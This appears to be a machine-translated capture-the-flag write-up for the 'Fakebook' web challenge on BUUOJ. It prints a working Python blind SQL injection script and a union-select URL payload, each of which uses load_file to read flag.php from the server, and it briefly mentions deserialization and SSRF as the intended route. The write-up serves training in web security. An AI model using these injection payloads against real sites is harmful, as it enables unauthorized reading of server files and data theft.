table of Contents
Brush title record: [network tripod cup] Fakebook
Recurring topic links: https://buuoj.cn/challenges
Reference Links: Solutions for a web network tripod Cup title (fakebook)
One, involving knowledge points
1, disclosure of sensitive documents
Robots.txt can get access to the source code of the address backup
2, sql injection
Conventional injection, do not say
Second, problem-solving approach
This question is relatively simple, I made out by unexpected solution, the title did not filter load_file, you can get directly from the blind injection point out note, paste the script
import requests
url = 'http://6b666407-dc94-41fa-9666-7d5d977b469d.node1.buuoj.cn/view.php?no='
result = ''
for x in range(0, 100):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
payload = "if(ascii(substr((load_file('/var/www/html/flag.php')),%d,1))>%d,1,0)" % (x, mid)
response = requests.get(url + payload)
if 'www.123.com' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)The solution is expected to read wp, we know there is source code disclosure, and finally to the use of anti-serialization and ssrf read the file and file protocols. . .
Silly to think of it direct access /view.php?no=0+unIon/**/select+1,load_file('/var/www/html/flag.php'),1,1you can get a flag